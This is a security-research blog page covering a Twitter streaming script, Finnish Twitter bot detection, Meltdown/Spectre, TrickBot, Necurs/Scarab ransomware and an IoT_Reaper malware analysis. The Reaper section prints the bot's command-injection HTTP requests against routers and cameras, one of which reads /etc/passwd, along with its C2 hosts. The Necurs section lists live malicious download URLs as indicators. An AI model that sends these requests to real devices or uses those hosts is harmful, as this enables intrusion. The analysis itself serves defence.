def process_tweet(status):
  if "text" in status:
    print status["text"]

The other function that will run in the context of the processing thread is a function to get items that were pushed into the queue. Here’s what it looks like.

def tweet_processing_thread():
  while True:
    item = tweet_queue.get()
    process_tweet(item)
    tweet_queue.task_done()

There are also two functions in our main thread. This one implements the same logic for attaching to a Twitter stream as in our first example. However, instead of calling process_tweet() directly, it pushes tweets onto the queue.

# Main thread
def get_tweet_stream(target_list, twarc):
  if len(target_list) > 0:
    query = ",".join(target_list)
    print "Search: " + query
    for tweet in twarc.filter(track = query):
      tweet_queue.put(tweet)
  else:
    print "Getting 1% sample."
    for tweet in twarc.sample():
      tweet_queue.put(tweet)

Now for our main function. We’ll start by creating a twarc object, and getting command-line args (as before):

if __name__ == '__main__':
  consumer_key=""
  consumer_secret=""
  access_token=""
  access_token_secret=""

  twarc = Twarc(consumer_key, consumer_secret, access_token, access_token_secret)

  target_list = []
    if (len(sys.argv) > 1):
      target_list = sys.argv[1:]

Next, let’s create the queue and start our processing thread.

  tweet_queue = Queue.Queue()
  thread = threading.Thread(target=tweet_processing_thread)
  thread.daemon = True
  thread.start()

Since listening to a Twitter stream is essentially an endless loop, let’s add the ability to catch ctrl-c and clean up if needed.

  while True:
    try:
      get_tweet_stream(target_list, twarc)
    except KeyboardInterrupt:
      print "Keyboard interrupt..."
      # Handle cleanup (save data, etc)
      sys.exit(0)
    except:
      print("Error. Restarting...")
      time.sleep(5)
      pass

If you want to observe a queue buildup, add a sleep into the process_tweet() function, and attach to a stream with high enough volume (such as passing “trump” as a command-line parameter). Have fun listening to Twitter streams!



Further Analysis Of The Finnish Themed Twitter Botnet

In a blog post I published yesterday, I detailed the methodology I have been using to discover “Finnish themed” Twitter accounts that are most likely being programmatically created. In my previous post, I called them “bots”, but for the sake of clarity, let’s refer to them as “suspicious accounts”.

These suspicious accounts all follow a subset of recommended profiles presented to new Twitter users. In many cases, these automatically created Twitter accounts follow exactly 21 users. The reason I pursued this line of research was because it was similar to a phenomenon I’d seen happening in the US earlier last year. Check this post for more details about that case.

In an attempt to estimate the number of accounts created by the automated process described in my previous post, I ran the same analysis tool against a list of 114 Twitter profiles recommended to new Finnish users. Here is the list.

juhasipila
TuomasEnbuske
alexstubb
hsfi
mikko
rikurantala
yleuutiset
jatkoaika
smliiga
Valavuori
SarasvuoJari
niinisto
iltasanomat
Tami2605
KauppalehtiFi
talouselama
TeemuSel8nne
nokia
HeikelaJussi
hjallisharkimo
Linnanahde
tapio_suominen
vrantanen
meteorologit
tikitalk10
yleurheilu
JaajoLinnonmaa
hirviniemi
pvesterbacka
taloussanomat
TuomasKyr
MTVUutiset
Haavisto
SuomenKuvalehti
MikaelJungner
paavoarhinmaki
KajKunnas
SamiHedberg
VilleNiinisto
HenkkaHypponen
SaskaSaarikoski
jhiitela
Finnair
TarjaHalonen
leijonat
JollaHQ
filsdeproust
makinenantti
lottabacklund
jyrkikasvi
JethroRostedt
Ulkoministerio
valtioneuvosto
Yleisradio
annaperho
liandersson
pekkasauri
neiltyson
villetolvanen
akiriihilahti
TampereenPoika
madventures
Vapaavuori
jkekalainen
AppelsinUlla
pakalupapito
rakelliekki
kyleturris
tanelitikka
SlushHQ
arcticstartup
lindaliukas
goodnewsfinland
docventures
jasondemers5
Retee27
H_Kovalainen
ipaananen
FrenzziiiBull
ylenews
digitoday
jraitamaa
marmai
MikaVayrynen
LKomarov
ovi8
paulavesala
OsmoSoininvaara
juuuso
JaanaPelkonen
saaraaalto
yletiede
TimoHaapala
Huuhkajat
ErvastiPekka
JussiPullinen
rsiilasmaa
moia
Palloliitto
teroterotero
ARaanta31
kirsipiha
JPohjanpalo
startupsauna
aaltoes
Villebla
MariaVeitola
merjaya
MikiKuusi
MTVSportfi
EHaula
svuorikoski
andrewickstroem
kokoomus

For each account, my script saved a list of accounts suspected of being automatically created. After completing the analysis of these 114 accounts, I iterated through all collected lists in order to identify all unique account names across those lists.

Across the 114 recommended Twitter profiles, my analysis identified 5631 unique accounts. Here are the (first twenty) age ranges of the most recently created accounts:

All age ranges

Age ranges of all suspicious Twitter accounts identified by my script

It has been suggested (link in Finnish) that these accounts appeared when a popular game, Growtopia, asked its players to follow their Twitter account after a game outage, and those new accounts started following recommended Twitter profiles (including those of Haavisto and Niinistö). In order to check if this was the case, I collected a list of accounts following @growtopiagame, and checked for accounts that appear on both that list, and the list of suspicious accounts collected in my previous step. That number was 3. This likely indicates that the accounts my analysis identified aren’t players of Growtopia.



Someone Is Building A Finnish-Themed Twitter Botnet

Finland will hold a presidential election on the 28th January 2018. Campaigning just started, and candidates are being regularly interviewed by the press and on the TV. In a recent interview, one of the presidential candidates, Pekka Haavisto, mentioned that both his Twitter account, and the account of the current Finnish president, Sauli Niinistö had recently been followed by a number of bot accounts. I couldn’t resist investigating this myself.

I wrote a tool to analyze a Twitter account’s followers. The Twitter API only gives me access to the last 5000 accounts that have followed a queried account. However, this was enough for me to find some interesting data.

As I previously wrote, newly created bulk bot accounts often look very similar. I implemented some logic in my follower analysis tool that attempts to identify bots by looking for a combination of the following:

  • Is the account still an “egg” (default profile settings, default picture, etc.)?
  • Does the account follow exactly 21 other accounts?
  • Does the account follow very few accounts (less than 22)?
  • Does the account have a bot-like name (a string of random characters)?
  • Does the account have zero followers?
  • Has the account tweeted zero times?

Each of the above conditions give a score. If the total of all scores exceeds an arbitrary value, I record the name of the account.

I ran this tool against @Haavisto and @niinisto Twitter accounts and found the following:
Matches for @Haavisto account: 399
Matches for @niinisto account: 330

In both cases, the accounts in question were by-and-large under 2 months old.

Haavisto bot account age ranges

Account age ranges for bots following @Haavisto

 

Niinisto account bot follower age ranges

Account age ranges for bots following @niinisto

Interestingly, I checked the intersection between these two groups of bots. Only 49 of these accounts followed both @Haavisto and @niinisto.

Checking a handful of the flagged accounts manually using the Twitter web client, I quickly noticed that they all follow a similar selection of high-profile Finnish twitter accounts, including accounts such as:

Tuomas Enbuske (@TuomasEnbuske) – a Finnish celebrity
Riku Rantala (@rikurantala) – host of Madventures
Sauli Niinistö (@niinisto) – Finland’s current president
Juha Sipilä (@juhasipila) – Finland’s prime minister
Alexander Stubb (@alexstubb) – Former prime minister of Finland
Pekka Haavisto (@Haavisto) – presidential candidate
YLE (@yleuutiset) – Finland’s equivalent of the BBC
Kauppalehti (@KauppalehtiFi) – a popular Finnish newspaper
Ilta Sanomat (@iltasanomat) – a popular Finnish newspaper
Talous Sanomat (@taloussanomat) – a prominent financial news source
Helsingin Sanomat (@hsfi) – Helsinki’s local newspaper
Ilmatieteen laitos (@meteorologit) – Finnish weather reporting source

What the bots are following

All the bots were following similar popular Finnish Twitter accounts, such as these.

Running the same analysis tool against Riku Rantala’s account yielded similar results. In fact, Riku has been the recipient of 660 new bot followers (although some of them were added on previous waves, judging by the account ages).

Account age ranges for bots following @rikurantala

I have no doubt that the other accounts listed above (and a few more) have recently been followed by several hundred of these bots.

By the way, running the same analysis against the @realDonaldTrump account only found 220 new bots. To verify, I also ran the tool against @mikko yielding a count of 103 bots, and against @rsiilasmaa I found only 38.

It seems someone is busy building a Finnish-themed Twitter botnet. We don’t yet know what it will be used for.



Some Notes On Meltdown And Spectre

The recently disclosed Meltdown and Spectre vulnerabilities can be viewed as privilege escalation attacks that allow an attacker to read data from memory locations that aren’t meant to be accessible. Neither of these vulnerabilities allow for code execution. However, exploits based on these vulnerabilities could allow an adversary to obtain sensitive information from memory (such as credentials, certificates, credit card information, etc.)

Exploits based on the Meltdown and Spectre vulnerabilities work by exploiting a feature of modern processors known as speculative execution (originally proposed by R. M. Tomasulo in 1967). Explained in simple terms, these exploits perform roughly the following four steps:

  • Flush or evict cache lines
  • Run code that causes the processor to perform speculative operations
  • Measure time to access certain cache locations known to contain secret data
  • Infer what that data was from measured access times

What is speculative execution?

Speculative execution is a technique used by high-speed processors in order to increase performance by guessing likely future execution paths and prematurely executing the instructions in them.

Although the results of these speculative execution paths are discarded if program control flow fails to reach them, they can leave behind observable effects in the system. The Meltdown and Spectre white papers primarily detail techniques whereby processor cache lines are examined in order to infer the results of speculative operations. However, the Spectre paper also suggests several other methods (not necessarily related to examining the cache) to do this, and concludes that “virtually any observable effect of speculatively executed code can be leveraged to leak sensitive information”. The primary techniques used to examine processor cache lines in the Meltdown and Spectre papers are Flush+Reload and Evict+Reload.

How do Flush+Reload and Evict+Reload work?

These techniques work by measuring the time it takes to perform a memory read at an address corresponding to an evicted or flushed cache line. If, after an operation, the monitored cache line was recently accessed, data will exist in the cache and access will be fast. If the cache line was not recently accessed, the read will be slow.

Flush+Reload illustration.

Here’s an example of cache line read times in a Flush+Reload attack. Note the downward spike indicating a faster read at one location. (Source: https://meltdownattack.com/meltdown.pdf)

What is the difference between Flush+Reload and Evict+Reload?

The main difference between these two techniques is the mechanism used for clearing the cache.

Flush+Reload uses a dedicated machine instruction, e.g., x86’s clflush, to evict the cache lines.

Evict+Reload forces contention on the cache set that stores the line, causing the processor to discard the contents of that cache line. Evict+Reload techniques are typically used when access to clflush is unavailable (e.g. from JavaScript).

Example code in the Spectre white paper (written in C) uses _mm_clflush() to perform a Flush+Reload attack (see Appendix A of the paper for details).

An example of JavaScript Evict+Reload can be found here.  Note that this example is not the actual technique described in the Spectre white paper. The researchers note that the accuracy of performance.now() is intentionally degraded to dissuade timing attacks, so they implemented a more high-resolution timer by spawning separate threads that repeatedly decrement a value in a shared memory location.

Although Meltdown and Spectre utilize the same basic premise, there are a few differences in the details of how they work, and what they can be used for.

Spectre

A number of proof of concepts exists for Spectre.

One proof of concept uses the Linux kernel’s eBPF mechanism in order to execute a code construct in the context of the OS kernel, thus leading to similar type of privilege escalation as presented by Meltdown, but without using kernel exceptions.

Another Spectre proof of concept allows the host kernel memory space of a KVM (Linux Kernel Virtual Machine) to be exposed. This attack, however, needs admin access to the KVM guest image.

One of the most interesting applications of Spectre is a JavaScript-based proof of concept that can access memory from within the browser process it was run. This exploit contains code that, when translated by a JIT, evaluates to a specific set of machine instructions. Execution of these JavaScript-based exploits happen within the context of the browser, and cannot read memory from outside of the browser process. However, these examples can readily be turned into weaponized exploits designed to extract secrets from within a browser’s memory space (such as credentials, certificates, etc.)

Spectre proof of concepts have been shown to work on Intel, ARM, and AMD processors.

Meltdown

Meltdown exploits scenarios where some CPUs allow out-of-order execution of user instructions to read kernel memory. Meltdown uses exception handlers to achieve this.

  • Currently, Meltdown proof of concepts have only been successfully tested on Intel CPUs.
  • Meltdown requires the attacker to execute code on the victim’s system itself.
  • Meltdown can be used to defeat kernel address space layout randomization (KASLR).
  • Meltdown can also be used to read memory from adjacent virtualized containers (Docker, LXC, OpenVZ) on the same physical host that share the same kernel.
  • The Meltdown vulnerability is effectively shut down by the KAISER patch (see below).

Mitigations

Most operating systems have already received an update that includes the KAISER patch. This patch implements a stronger isolation between kernel and user space, thus breaking the techniques that allow the Meltdown vulnerability to be exploited to read kernel memory. With KAISER in place, it is still possible to break KASLR using Meltdown exploitation techniques. However, this technique becomes non-trivial.

Since some Spectre exploits are likely to target browsers, we expect browser vendors will patch against these attacks in the near future. These patches will likely disrupt scripts’ ability to accurately record timings, and thus break the Evict+Reload portion of the attack. Depending on when you read this, Firefox may have already been patched against some of these attack vectors.

Update: iOS 11.2.2 also patches Safari against Spectre.

KAISER performance concerns

The KAISER patch is known to affect system performance. Performance impacts will be higher on software that performs a lot of system calls. Actual performance impact numbers will depend on the software and environment in question. It is likely that certain server operating environments will be affected the most. Home machines will likely not see any significant impact.

Will the KAISER patch slow down cryptomining?

Mining, whether CPU- or GPU-based shouldn’t be affected (there shouldn’t be any syscalls in mining loops). Monero (a CPU-based miner) network hashrate appears largely unchanged since the patch.

Detection of Meltdown and Spectre

Kernel memory violations are generated relatively infrequently by regular software. However, any process attempting to exploit Meltdown would generate thousands of such violations over a short duration. Capsule8 suggests that a system designed to monitor for an abundance of segmentation violations for kernel memory addresses (especially from the same PID) could be used to detect meltdown exploits in action.

Endgame recommends monitoring for cache timing attacks using hardware performance counters. In their blog, they examine methods to detect signs of Meltdown exploitation using TSX counters, page flush counters, and by counting last-level-cache (LLC) micro operations. They also examine how it might be possible to detect Spectre attacks by recording speculative branch execution leaks.

Future

It is likely that software exploiting either Meltdown or Spectre will gather secrets as an intermediate step of a longer attack chain (e.g. read credentials from memory and use them to elevate a process). Although patches against Meltdown have already been released for current modern operating systems, there are plenty of legacy systems in the wild, and many users wait a long time, or don’t bother patching at all. Just as old SMB vulnerabilities were leveraged by WannaCry in the not-too-distant past, we’d expect Meltdown to be fair game in the future.

In the near future it is possible that new findings arise around speculative execution implementations, especially on the Intel platform.



Don’t Let An Auto-Elevating Bot Spoil Your Christmas

Ho ho ho! Christmas is coming, and for many people it’s time to do some online shopping.
Authors of banking Trojans are well aware of this yearly phenomenon, so it shouldn’t come as a surprise that some of them have been hard at work preparing some nasty surprises for this shopping season.

And that’s exactly what TrickBot has just gone and done. As one of the most prevalent banking malware for Windows nowadays, we’ve recently seen it diversify into attacking Nordic banks. We’ve blogged about that a couple of times already.

As usual, the Trojan is being delivered via spam campaigns. According to this graph, based on our telemetry, most spam was distributed between Tuesday afternoon and Wednesday morning:

trickbot_spam_graph_20171213

The spam emails we’ve seen typically have a generic subject like “Your Payment – 1234”, a body with nothing but “Your Payment is attached”, and indeed an attachment which is a Microsoft Word document with instructions in somewhat poor English…

trickbot_spam_word_doc

Clicking the button will not reveal any document content, but launch a macro that will eventually download and run the TrickBot payload.
Same old trick, but some people who have just bought a Christmas gift might still fall for it and end up with another ‘gift’ installed on their computer.

And that ‘gift’ is the most interesting part of this story. The newest payload underwent some changes which are, well, remarkable…

Targets

Since its initial appearance during Fall 2016, the actors have been actively developing the malware, and are constantly expanding and changing the targets. Here a short summary of the recently spotted changes:

  • Removed: banks in Australia, New Zealand, Argentina, Italy
  • Changed: a few Spanish, Austrian and Finnish targets are now found in the Dynamic Injection list (adding interception code to the actual web page) instead of using Static Injection (replacing the complete web page)
  • Added: new banks, particularly in France, Belgium and Greece.

Anti-sandbox checks

Up till now, we were not aware of any features in TrickBot that were checking if the malware is run in a virtual machine or a sandboxed environment used for automatic analysis. The new version has introduced a few simple checks against some known sandboxes by calling GetModuleHandle for the following DLLs:

trickbot_antisandbox

(More info about every DLL can be found here)

If any of these modules are found, the payload just quits.

Interestingly, we have also found a few encrypted strings that seem to indicate detection of the Windows virtual machine images that Microsoft provides for web developers to test their code in Internet Explorer and Edge, however, these strings are not used anywhere (yet). Let’s see if the actors will expand their sandbox evasion attempts in a future version.

trickbot_test_vm

Auto-elevation

But we have saved the best for last. When the payload was running, we noticed that it didn’t run with user rights, as it always did before. Instead, it was running under the SYSTEM account, i.e. with full system privileges. There was no UAC prompt during the infection sequence, so TrickBot must have used an auto-elevation mechanism to gain admin rights.

A little search in the disassembly quickly revealed an obvious clue:

trickbot_elevation_1

Combined with a few hard-coded CLSIDs …

trickbot_elevation_2

… we found out that the actors have implemented a UAC bypass which was (as far as we are aware of) publicly disclosed only a few months ago. The original discovery is explained here:
https://msitpros.com/?p=3960
And later implemented as a standalone piece of code, and most likely the main inspiration for the TrickBot coders:
https://gist.github.com/hfiref0x/196af729106b780db1c73428b5a5d68d

In short: this bypass is a re-implementation of a COM interface to launch ShellExec with admin rights, and it is used in a standard Windows component “Component Manager Administrator Kit” to install network connections on machine level.

It works everywhere from Windows 7 up to the latest Windows 10 version 1709 with default UAC settings, and considering it’s basically a Windows feature, probably hard to address. In other words, perfect for usage in malware, and it wouldn’t surprise us if we’ll see the same bypass in more families soon.

Thanks to Päivi for the spam graph.

 



Necurs’ Business Is Booming In A New Partnership With Scarab Ransomware

Necurs’ spam botnet business is doing well as it is seemingly acquiring new customers. The Necurs botnet is the biggest deliverer of spam with 5 to 6 million infected hosts online monthly, and is responsible for the biggest single malware spam campaigns. Its service model provides the whole infection chain: from spam emails with malicious malware downloader attachments, to hosting the payloads on compromised websites.

necurs_other

Necurs is contributing a fair bit to the malicious spam traffic we observe.

The Necurs botnet is most renown for distributing the Dridex banking Trojan, Locky ransomware, and “pump-and-dump” penny-stock spam. Since 2016 it has expanded its deliverables beyond these three and have included other families of ransomware, such as GlobeImposter and Jaff, and the banking trojan Trickbot to its customer base, with Locky being its brand-image malware deliverable with multiple malware spam campaigns per week.

This morning at 9AM (Helsinki time, UTC +2) we observed the start of a campaign with malicious .vbs script downloaders compressed with 7zip. The email subject lines are “Scanned from (Lexmark/HP/Canon/Epson)” and the attachment filename is formatted as “image2017-11-23-(7 random digits).7z“.

The final payload (to our surprise) was Scarab ransomware, which we haven’t seen previously delivered in massive spam campaigns. Scarab ransomware is a relatively new ransomware variant first observed last June, and its code is based on the open source “ransomware proof-of-concept” called HiddenTear.

This version doesn’t change the file names, but appends a new file extension to the encrypted files with “.[suupport@protonmail.com].scarab”, and drops the following ransom note after the encryption:

ransomnote

The spam campaigns from Necurs are following the same format from campaign to campaign, consisting of social engineering subject line themes varying from financial to office utilities, with very minimal text body contents and spiced up usually with malicious attachments, sometimes just URLs. And as the simple social engineering themes are effective, Necurs tends to re-use the spam themes in its campaigns, sometimes within a rather short cycle. In this particular case, the subject lines used in this spam campaign were last seen in a Locky ransomware campaign exactly two weeks ago, the only difference being the extension of the attached downloader.

locky_scarab

This has already given Scarab-ransomware a massive popularity bump, according to ransomware submissions ID ransomware.

We’re interested to see the future affiliations of this massive botnet and observe how it’s able to change the trends and popularity of malware types and certain families. In the meanwhile, we’ll keep blocking these threats, keeping our customers safe.

IOCs:

b4a671ec80135bfb1c77f5ed61b8a3c80b2b6e51
7ac23eee5e15226867f5fbcf89f116bb01933227
d31beec9e2c7b312ecedb594f45a9f5174155c68
85dc3a0b833efb1da2efdcd62fab565c44f22718
da1e2542b418c85f4b57164e46e04e344db58ab8
a6f1f2dd63d3247adb66bd1ff479086207bd4d2b
14680c48eec4e1f161db1a4a990bd6833575fc8e
af5a64a9a01a9bd6577e8686f79dce45f492152e
c527bc757a64e64c89aaf0d9d02b6e97d9e7bb3d
3f51fb51cb1b9907a7438e2cef2e538acda6b9e9
b0af9ed37972aab714a28bc03fa86f4f90858ef5
6fe57cf326fc2434c93ccc0106b7b64ec0300dd7
http://xploramail.com/JHgd476?
http://miamirecyclecenters.com/JHgd476?
http://hard-grooves.com/JHgd476?
http://xploramail.com/JHgd476?
http://atlantarecyclingcenters.com/JHgd476?
http://pamplonarecados.com/JHgd476?
http://hellonwheelsthemovie.com/JHgd476?


RickRolled by none other than IoTReaper

IoT_Reaper overview

IoT_Reaper, or the Reaper in short, is a Linux bot targeting embedded devices like webcams and home router boxes. Reaper is somewhat loosely based on the Mirai source code, but instead of using a set of admin credentials, the Reaper tries to exploit device HTTP control interfaces.

It uses a range of vulnerabilities (a total of ten as of this writing), from years 2013-2017. All of the vulnerabilities have been fixed by the vendors, but how well are the actual devices updated is another matter. According to some reports, we are talking about a ballpark of millions of infected devices.

In this blogpost, we just wanted to add up some minor details to good reports already published by Netlab 360 [1], CheckPoint [2], Radware [3] and others.

Execution overview

When the Reaper enters device, it does some pretty intense actions in order to disrupt the devices monitoring capabilities. For example, it just brutally deletes a folder “/var/log” with “rm -rf”.
Another action is to disable the Linux watchdog daemon, if present, by sending a specific IOCTL to watchdog device:

watchdog

After the initialization, the Reaper spawns a set of processes for different roles:

  • Poll the command and control servers for instructions
  • Start a simple status reporting server listening on port 23 (telnet)
  • Start apparently unused service in port 48099
  • Start scanning for vulnerable devices

All the child processes run with a random name, such as “6rtr2aur1qtrb”.

String obfuscation

The Reaper’s spawned child processes use a trivial form of string obfuscation, which is surprisingly effective. The main process doesn’t use any obfuscation, but all child processes use this simple scheme when they start executing. Basically, it’s a single-byte XOR (0x22), but the way the data is arranged in memory makes it a bit challenging to connect the data to code.

Main process allocates a table in heap and copies the XOR-encoded data in. Later when the child processes want to reference to particular encoded data, it decodes it in heap and references the decoded data with a numeric index. After usage, the data is decoded back to its original form.

The following screenshot is a good presentation of the procedure:

decrypt

Command and Control

The Reaper polls periodically a fixed set of C2 servers:

weruuoqweiur.com, e.hl852.com, e.ha859.com and 27.102.101.121

The control messages and replies are transmitted over a clear-text HTTP, and the beacons are using the following format:

  /rx/hx.php?mac=%s%s&type=%s&port=%s&ver=%s&act=%d

The protocol is very simple: basically there are only two major functions – shutdown or execute arbitrary payload using the system shell.

Port scanning

One of the child processes starts to scan for vulnerable victims. In addition to randomly generated IP addresses, Reaper uses nine hard-coded addresses for some unkown reason. The addess is scanned with a set of apparently random-looking set of ports, and then with a set of bit more familiar ports:

80, 81, 82, 83, 84, 88, 1080, 3000, 3749, 8001, 8060, 8080, 8081, 8090, 8443, 8880, 10000

In fact, the randomish ports are just byte-swapped presentation of the above port list. So for example, 8880 = 0x22b0 turns to 0xb022 = 45090. The reason for this is still unknown.

It is possible that the author was just lazy and left off some endianness handling code, or maybe it is some other error in the programming logic. Some of the IoT-devices are big-endian, so the ports need to be swapped in order to use them with socket code.

Screenshot of the hard-coded list of ports:

ports

This is the list of hard-coded IP-addresses:

217.155.58.226
85.229.43.75
213.185.228.42
218.186.0.186
103.56.233.78
103.245.77.113
116.58.254.40
201.242.171.137
36.85.177.3

Exploitation

If the Reaper finds promising victim, it next tries to send HTTP-based exploit payload to the target. A total of ten different exploits have been observed so far, and they are related to IoT devices HTTP-based control interface. Here’s a list of the targeted vulnerabilities and HTTP requests associated with them:

1 – Unauthenticated Remote Command Execution for D-Link DIR-600 and DIR-300

Exploit URI: POST /command.php HTTP/1.1

 

2 – CVE-2017-8225: exploitation of custom GoAhead HTTP server in several IP cameras

GET /system.ini?loginuse&loginpas HTTP/1.1

 

3 – Exploiting Netgear ReadyNAS Surveillance unauthenticated Remote Command Execution vulnerability

GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%%27echo+nuuo+123456;%%27 HTTP/1.1

 

4 – Exploiting of Vacron NVR through Remote Command Execution

GET /board.cgi?cmd=cat%%20/etc/passwd HTTP/1.1

 

5 – Exploiting an unauthenticated RCE to list user accounts and their clear text passwords on D-Link 850L wireless routers

POST /hedwig.cgi HTTP/1.1

 

6 – Exploiting a Linksys E1500/E2500 vulnerability caused by missing input validation

POST /apply.cgi HTTP/1.1

 

7 – Exploiting of Netgear DGN DSL modems and routers using an unauthenticated Remote Command Execution

GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&curpath=/&currentsetting.htm=1cmd=echo+dgn+123456 HTTP/1.1

 

8 – Exploiting of AVTech IP cameras, DVRs and NVRs through an unauthenticated information leak and authentication bypass

GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.* HTTP/1.1

 

9 – Exploiting DVRs running a custom web server with the distinctive HTTP Server header ‘JAWS/1.0’.

GET /shell?echo+jaws+123456;cat+/proc/cpuinfo HTTP/1.1

 

10 – Unauthenticated remote access to D-Link DIR-645 devices

POST /getcfg.php HTTP/1.1

 

Other details and The Roll

  • Reaper makes connection checks to google DNS server 8.8.8.8. It won’t run without this connectivity.
  • There is no hard-coded payload functionality in this variant. The bot is supposedly receiving the actual functionality, like DDoS instructions, over the control channel.
  • The code contains an unused rickrolling link (yes, I was rickrolled)

Output from IDAPython tool that dumps encoded strings (rickrolling is the second one):

rickroll

Sample hash

Analysis on this post is based on a single version of the Reaper (md5:37798a42df6335cb632f9d8c8430daec)

References

[1] http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/
[2] https://research.checkpoint.com/new-iot-botnet-storm-coming/
[3] https://blog.radware.com/security/2017/10/iot_reaper-botnet/



Facebook Phishing Targeted iOS and Android Users from Germany, Sweden and Finland

Two weeks ago, a co-worker received a message in Facebook Messenger from his friend. Based on the message, it seemed that the sender was telling the recipient that he was part of a video in order to lure him into clicking it. The shortened link was initially redirecting to Youtube.com, but was later on changed […]

2017-10-30

The big difference with Bad Rabbit

Bad Rabbit is the new bunny on the ransomware scene. While the security community has concentrated mainly on the similarities between Bad Rabbit and EternalPetya, there’s one notable difference which has not yet gotten too much attention. The difference is that Bad Rabbit’s disk encryption works. EternalPetya re-used the custom disk encryption method from the […]

2017-10-27

Following The Bad Rabbit

On October 24th, media outlets reported on an outbreak of ransomware affecting various organizations in Eastern Europe, mainly in Russia and Ukraine. Identified as “Bad Rabbit”, initial reports about the ransomware drew comparisons with the WannaCry and NotPetya (EternalPetya) attacks from earlier this year. Though F-Secure hasn’t yet received any reports of infections from our […]

2017-10-26

Twitter Forensics From The 2017 German Election

Over the past month, I’ve pointed Twitter analytics scripts at a set of search terms relevant to the German elections in order to study trends and look for interference. Germans aren’t all that into Twitter. During European waking hours Tweets in German make up less than 0.5% of all Tweets published. Over the last month, […]

2017-09-25

TrickBot In The Nordics, Episode II

The banking trojan TrickBot is not retired yet. Not in the least. In a seemingly never ending series of spam campaigns – not via the Necurs botnet this time – we’ve spotted mails written in Norwegian that appear to be sent by DNB, Norway’s largest bank. The mail wants the recipient to believe that they […]

2017-09-14

Working Around Twitter API Restrictions To Identify Bots

Twitter is by far the easiest social media platform to work with programmatically. The Twitter API provides developers with a clean and simple interface to query Twitter’s objects (Tweets, users, timelines, etc.) and bindings to this API exist for many languages. As an example, I’ve been using Tweepy to write Python scripts that work with Twitter data. […]

2017-08-31

Trump Hating South Americans Hacked HBO

Last week – I read the message “Mr. Smith” reportedly sent to HBO… and it brought up a few questions. And also, it offered some “answers” to questions that I’m often asked. Questions such as “how much money do cyber criminals make?” Here’s the start of the message. First, let’s examine Mr. Smith and his […]

2017-08-24

Break your own product, and break it hard

Hello readers, I am Andrea Barisani, founder of Inverse Path, which is now part of F-Secure. I lead the Hardware Security consulting team within F-Secure’s Cyber Security Services. You may have heard of our USB armory product, an innovative compact computer for security applications that is 100% open hardware, open source and Made in Italy. […]

2017-07-19

Retefe Banking Trojan Targets Both Windows And Mac Users

Based on our telemetry, customers (mainly in the region of Switzerland and Germany) are being targeted by a Retefe banking trojan campaign which uses both Windows and macOS-based attachments. Its massive spam run started earlier this week and peaked yesterday afternoon (Helsinki time). TrendMicro did a nice writeup on this threat earlier this week. The […]

2017-07-14

How EternalPetya Encrypts Files In User Mode

On Thursday of last week (June 29th 2017), just after writing about EternalPetya, we discovered that the user-mode file encryption-decryption mechanism would be functional, provided a victim could obtain the correct key from the malware’s author. Here’s a description of how that mechanism works. EternalPetya malware uses the standard Win32 crypto API to encrypt data. […]

2017-07-04